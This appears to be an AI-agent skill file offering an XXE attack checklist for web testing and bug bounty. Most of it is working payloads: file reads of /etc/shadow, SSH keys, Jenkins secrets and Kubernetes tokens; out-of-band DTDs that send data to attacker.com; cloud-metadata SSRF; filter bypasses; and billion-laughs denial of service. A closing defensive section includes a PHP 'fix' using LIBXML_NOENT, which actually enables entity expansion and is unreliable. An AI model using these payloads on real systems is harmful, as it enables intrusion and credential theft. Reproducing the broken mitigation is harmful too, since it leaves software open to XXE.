XML External Entity injection testing checklist: classic XXE, blind XXE (out-of-band), XXE via file upload (SVG/docx), XXE in SOAP/REST, error-based XXE, XInclude attacks, and XXE filter bypass. Use for web app XXE testing and bug bounty.
Use this skill when the conversation involves any of:
XXE, XML external entity, blind XXE, out-of-band XXE, XXE file upload, SVG XXE, SOAP XXE, XInclude, entity bypass, XXE SSRF, XXE file read
When this skill is active:
XML External Entity (XXE) is a vulnerability that occurs when XML parsers process external entity references within XML documents. XXE attacks target applications that parse XML input and can lead to:
flowchart TD
A[XXE Vulnerability] --> B[File Disclosure]
A --> C[SSRF]
A --> D[Denial of Service]
A --> E[Remote Code Execution]
B -->|"Access to"| B1[System Files]
B -->|"Access to"| B2[Application Configs]
B -->|"Access to"| B3[Database Credentials]
C -->|"Access to"| C1[Internal Services]
C -->|"Access to"| C2[Cloud Metadata]
C -->|"Access to"| C3[External Resources]
D -->|"Via"| D1[Billion Laughs]
D -->|"Via"| D2[Quadratic Blowup]
D -->|"Via"| D3[External Resource DoS]
E -->|"Via"| E1[PHP Expect]
E -->|"Via"| E2[Java Deserialization]
XXE vulnerabilities arise from XML's Document Type Definition (DTD) feature, which allows defining entities that can reference external resources. When a vulnerable XML parser processes these entities, it retrieves and includes the external resources, potentially exposing sensitive information.
In practice, full remote code execution rarely stems from XXE alone; it typically requires language-specific gadgets—such as PHP's expect:// wrapper or Java deserialization sinks—which XXE merely helps reach.
sequenceDiagram
actor A as Attacker
participant C as Client
participant S as Server
participant X as XML Parser
participant FS as File System
A->>C: Craft malicious XML with XXE payload
C->>S: Submit XML document
S->>X: Pass XML for parsing
X->>FS: Resolve external entity reference
FS->>X: Return sensitive file content
X->>S: Include file content in parsed result
S->>C: Return response with sensitive data
C->>A: Attacker views sensitive data
Types of XXE attacks include:
flowchart LR
A[XXE Attack Types] --> B[Classic XXE]
A --> C[Blind XXE]
A --> D[Error-based XXE]
A --> E[XInclude-based XXE]
B -->|"Direct Output"| B1[Response contains file content]
C -->|"Out-of-Band"| C1[Data exfiltration via callbacks]
D -->|"Error Messages"| D1[Data in error output]
E -->|"XInclude"| E1[Alternative to DTD]
flowchart TD
A[XML Injection Points] --> B[API Endpoints]
A --> C[File Uploads]
A --> D[Format Conversion]
A --> E[Legacy Interfaces]
A --> F[Hidden XML Parsers]
A --> G[Content-Type Conversion]
B --> B1[REST APIs]
B --> B2[GraphQL]
C --> C1[XML Files]
C --> C2[DOCX/XLSX]
C --> C3[SVG Images]
C --> C4[PDF Files]
D --> D1[JSON to XML]
D --> D2[CSV to XML]
E --> E1[SOAP]
E --> E2[XML-RPC]
E --> E3[SAML]
F --> F1[Hidden Parameters]
F --> F2[Legacy Code]
G --> G1[JSON endpoints accepting XML]
For each potential injection point, test with simple payloads:
Classic XXE (file retrieval):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
or
<!DOCTYPE ase [ <!ENTITY %test SYSTEM "http://sib.com/sib"> %test; ]>
<example>&test;</example>
Blind XXE (out-of-band detection):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % xxe SYSTEM "http://attacker-server.com/malicious.dtd">
%xxe;
]>
<root>test</root>
XInclude attack (when unable to define a DTD):
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>
SVG files:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/hostname" >
]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
or
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE example [
<!ENTITY test SYSTEM "file:///etc/shadow">
]>
<svg width="500" height="500">
<circle cx="50" cy="50" r="40" fill="blue" />
<text font-size="16" x="0" y="16">&test;</text>
</svg>
DOCX/XLSX files: Modify internal XML files (e.g., word/document.xml)
SOAP messages: Test XXE in SOAP envelope
SAML assertions are prime XXE targets. Test both requests and responses:
AuthnRequest XXE:
<samlp:AuthnRequest
xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
ID="_xxe" Version="2.0" IssueInstant="2025-01-01T00:00:00Z">
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<saml:Issuer>&xxe;</saml:Issuer>
</samlp:AuthnRequest>
Response Assertion XXE:
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/exfil">]>
<saml:Assertion>
<saml:AttributeValue>&xxe;</saml:AttributeValue>
</saml:Assertion>
</samlp:Response>
Encrypted Assertion XXE (Response Wrapping):
<!-- Inject XXE before encryption, Service Provider decrypts and processes -->
<saml:EncryptedAssertion>
<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd;]>
<EncryptedData>...</EncryptedData>
</saml:EncryptedAssertion>
EPUB files are ZIP archives containing XML. Target library management systems and e-reader apps:
<!-- content.opf inside EPUB -->
<?xml version="1.0"?>
<!DOCTYPE package [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<package xmlns="http://www.idpf.org/2007/opf" version="3.0">
<metadata>
<dc:title>&xxe;</dc:title>
</metadata>
</package>
Attack workflow:
META-INF/container.xml or content.opf
iOS deep linking configuration files:
<!-- apple-app-site-association generated from XML -->
<?xml version="1.0"?>
<!DOCTYPE config [
<!ENTITY xxe SYSTEM "file:///var/mobile/Containers/Data/Application/config.plist">
]>
<config>
<applinks>&xxe;</applinks>
</config>
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
]>
<data>test</data>
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
]>
<data>test</data>
Try changing Content-Type header from:
Content-Type: application/json
to:
Content-Type: application/xml
or:
Content-Type: text/xml
ValidatingWebhookConfiguration and MutatingWebhookConfiguration receive XML-formatted requests:
# Vulnerable admission webhook
apiVersion: v1
kind: Pod
metadata:
name: evil-pod
annotations:
# Webhook receives and parses this XML
config: |
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///var/run/secrets/kubernetes.io/serviceaccount/token">
]>
<config>&xxe;</config>
Exploitation flow:
# 1. Create pod with XXE payload in annotation
kubectl apply -f evil-pod.yaml
# 2. Admission webhook receives XML, processes with vulnerable parser
# 3. Service account token exfiltrated
# 4. Use token for privilege escalation
curl -k https://kubernetes.default.svc/api/v1/namespaces/default/pods \
-H "Authorization: Bearer $(cat token)"
ConfigMap XXE:
apiVersion: v1
kind: ConfigMap
metadata:
name: xxe-config
data:
config.xml: |
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/kubernetes/manifests/kube-apiserver.yaml">]>
<config>&xxe;</config>
Jenkins XML Config Parsing:
<!-- config.xml for Jenkins job -->
<?xml version="1.0"?>
<!DOCTYPE project [
<!ENTITY xxe SYSTEM "file:///var/jenkins_home/secrets/master.key">
]>
<project>
<description>&xxe;</description>
</project>
GitLab CI Artifact Processing:
# .gitlab-ci.yml
test:
script:
- echo '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/gitlab-runner/config.toml">]><root>&xxe;</root>' > report.xml
artifacts:
reports:
junit: report.xml # Parsed by GitLab
GitHub Actions Workflow:
# Vulnerable action that processes XML artifacts
- name: Parse XML Report
uses: vulnerable/xml-parser@v1
with:
xml-file: |
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///home/runner/.ssh/id_rsa">]>
<testsuites>&xxe;</testsuites>
Maven/Gradle Dependency Confusion:
<!-- malicious pom.xml in supply chain -->
<?xml version="1.0"?>
<!DOCTYPE project [
<!ENTITY xxe SYSTEM "http://attacker.com/exfil?data=">
]>
<project>
<modelVersion>4.0.0</modelVersion>
<name>&xxe;</name>
</project>
/etc/passwd (Unix user information)/etc/shadow (password hashes on Linux)C:\Windows\system32\drivers\etc\hosts (Windows hosts file)sequenceDiagram
actor A as Attacker
participant S as Vulnerable Server
participant I as Internal Service
participant C as Cloud Metadata
A->>S: Submit XXE payload targeting internal service
S->>I: Make request to internal service
I->>S: Return internal service response
S->>A: Return parsed result with internal data
A->>S: Submit XXE payload targeting cloud metadata
S->>C: Request cloud metadata (169.254.169.254)
C->>S: Return sensitive cloud information
S->>A: Return parsed result with cloud data
Internal Network Access: Scanning internal systems
Cloud Metadata Access: Accessing metadata services
AWS IMDSv2 (Token-based, harder via XXE):
<!-- IMDSv1 still works in legacy environments -->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name">]>
<!-- IMDSv2 requires PUT request for token first -->
<!-- Most XML parsers can't make PUT requests, limiting XXE exploitation -->
Azure Instance Metadata:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">]>
<!-- Requires Metadata: true header, may fail in XXE -->
GCP Metadata v2 (2024+):
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">]>
<!-- Now requires Metadata-Flavor: Google header -->
<!-- Classic XXE can't set custom headers, use SSRF chain -->
Workarounds for header-protected metadata:
<!-- Use jar:// protocol (Java) to bypass some restrictions -->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:http://metadata.google.internal!/computeMetadata/v1/instance/hostname">]>
<!-- Or chain with open redirect on same domain -->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://vulnerable-app.com/redirect?url=http://169.254.169.254/latest/meta-data/">]>
Billion Laughs Attack: Exponential entity expansion
<!DOCTYPE data [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<data>&lol3;</data>
Quadratic Blowup Attack: Large string repeating
<!DOCTYPE data [
<!ENTITY a "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa">
]>
<data>&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;</data>
External Resource DoS: Loading large or never-ending external resources
Case Variation:
<!docTypE test [ <!ENTity xxe SYSTEM "file:///etc/passwd"> ]>
Alternative Protocol Schemes:
file:///
php://filter/convert.base64-encode/resource=
gopher://
jar://
netdoc://
URL Encoding:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:%2F%2F%2Fetc%2Fpasswd"> ]>
<![CDATA[<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
]>]]>
<ns1:root xmlns:ns1="http://example.com">
<ns1:data xmlns:ns1="http://example.com" xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</ns1:data>
</ns1:root>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
<contact>
<name>Jean &xxe; Dupont</name>
<phone>00 11 22 33 44</phone>
<address>42 rue du CTF</address>
<zipcode>75000</zipcode>
<city>Paris</city>
</contact>
</contacts>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" >
]>
<foo>&xxe;</foo>
flowchart TD
A[XXE Testing Methodology] --> B[Identify XML Processing Points]
B --> C[Setup Out-of-Band Detection]
C --> D[Test Basic XXE Payloads]
D --> E[Analyze Results]
E --> F[Exploit Vulnerability]
F --> G[Expand Attack]
B --> B1[API Endpoints]
B --> B2[File Uploads]
B --> B3[SOAP/Legacy Interfaces]
C --> C1[Burp Collaborator]
C --> C2[Custom HTTP Server]
C --> C3[Interactsh]
D --> D1[Classic XXE]
D --> D2[Blind XXE]
D --> D3[Error-based XXE]
D --> D4[XInclude Attack]
E --> E1[Direct Data Exposure]
E --> E2[HTTP Callbacks]
E --> E3[Error Messages]
F --> F1[Local File Reading]
F --> F2[SSRF]
F --> F3[Advanced Exfiltration]
G --> G1[Sensitive Data]
G --> G2[Internal Network]
G --> G3[RCE Attempt]
/etc/hostname
sequenceDiagram
actor A as Attacker
participant AS as Attacker Server (DTD)
participant VS as Vulnerable Server
participant FS as File System
A->>AS: Host malicious DTD file
A->>VS: Submit XML with reference to external DTD
VS->>AS: Request malicious DTD
AS->>VS: Deliver DTD with file reading & exfiltration
VS->>FS: Read sensitive file
Note over VS: Process DTD instructions
VS->>AS: Make callback with file content in URL
AS->>A: Log request with exfiltrated data
Host a malicious DTD file on your server:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;
Use an XXE payload that references your DTD:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://attacker.com/malicious.dtd">
%dtd;
]>
<data>test</data>
Payload:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://your-attacker-server.com/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
External DTD (http://your-attacker-server.com/dtd.xml):
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://your-attacker-server.com/log.php?data=%data;'>">
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
Use XXE to trigger internal requests:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://internal-service:8080/admin"> ]>
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
<!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [<!ELEMENT foo ANY><!ENTITY xxe_test SYSTEM "file:///etc/passwd">]><foo>&xxe_test;</foo>
Create an SVG file with the payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="512px" height="512px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="14" x="0" y="16">&xxe;</text>
</svg>
Upload it where SVG is allowed (e.g., profile picture, comment attachment).
Basic entity testing:
file:// protocolhttp:// protocolContent delivery:
Protocol testing:
Format variations:
Bypasses:
# API Gateway Request Validator
RequestValidator:
Type: AWS::ApiGateway::RequestValidator
Properties:
ValidateRequestBody: true
ValidateRequestParameters: true
# Lambda authorizer to inspect XML
def lambda_handler(event, context):
body = event.get('body', '')
# Block DTD declarations
if '<!DOCTYPE' in body or '<!ENTITY' in body:
return {
'statusCode': 400,
'body': 'XML DTD not allowed'
}
# Size limit
if len(body) > 100000: # 100KB
return {
'statusCode': 413,
'body': 'Request too large'
}
plugins:
- name: xml-threat-protection
config:
source_size_limit: 1000000 # 1MB max
name_size_limit: 255 # Max element name length
child_count_limit: 100 # Max child elements
attribute_count_limit: 50 # Max attributes per element
entity_expansion_limit: 0 # Disable entity expansion
external_entity_limit: 0 # Disable external entities
dtd_processing: false # Disable DTD
<!-- XMLThreatProtection policy -->
<XMLThreatProtection name="XML-Threat-Protection">
<Source>request</Source>
<StructureLimits>
<NodeDepth>10</NodeDepth>
<AttributeCountPerElement>5</AttributeCountPerElement>
<NamespaceCountPerElement>3</NamespaceCountPerElement>
<ChildCount includeComment="true" includeElement="true" includeProcessingInstruction="true" includeText="true">10</ChildCount>
</StructureLimits>
<ValueLimits>
<Text>1000</Text>
<Attribute>100</Attribute>
<NamespaceURI>100</NamespaceURI>
<Comment>500</Comment>
<ProcessingInstructionData>500</ProcessingInstructionData>
</ValueLimits>
</XMLThreatProtection>
# ModSecurity rules for XXE
SecRule REQUEST_BODY "@rx <!ENTITY" \
"id:1000,phase:2,deny,status:403,msg:'XXE Attack Detected'"
SecRule REQUEST_BODY "@rx <!DOCTYPE.*\[" \
"id:1001,phase:2,deny,status:403,msg:'DTD Declaration Blocked'"
XML_PARSE_NO_XXE disables all external entity resolution by default.xml.* modules forbid external entities; enable only via feature_external_ges.XmlReaderSettings.DtdProcessing = Prohibit.XMLConstants.FEATURE_SECURE_PROCESSING is enabled and external-general-entities is false.AWS IMDSv2 now requires a session token. To exploit metadata via XXE you must first obtain a token with
PUT /latest/api/token and then pass it in the X-aws-ec2-metadata-token header of subsequent requests.
// Java (SAX/StAX/DOM)
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
# Python – prefer defusedxml
from defusedxml.ElementTree import fromstring
fromstring(xml_data)
// .NET
var settings = new XmlReaderSettings
{
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null
};
using var reader = XmlReader.Create(stream, settings);
// Go – standard encoding/xml does not resolve external entities
// but avoid streaming untrusted data into custom resolvers
type Safe struct{ }
// PHP – libxml
$old = libxml_disable_entity_loader(true);
$xml = simplexml_load_string($data, "SimpleXMLElement", LIBXML_NONET | LIBXML_NOENT);
libxml_disable_entity_loader($old);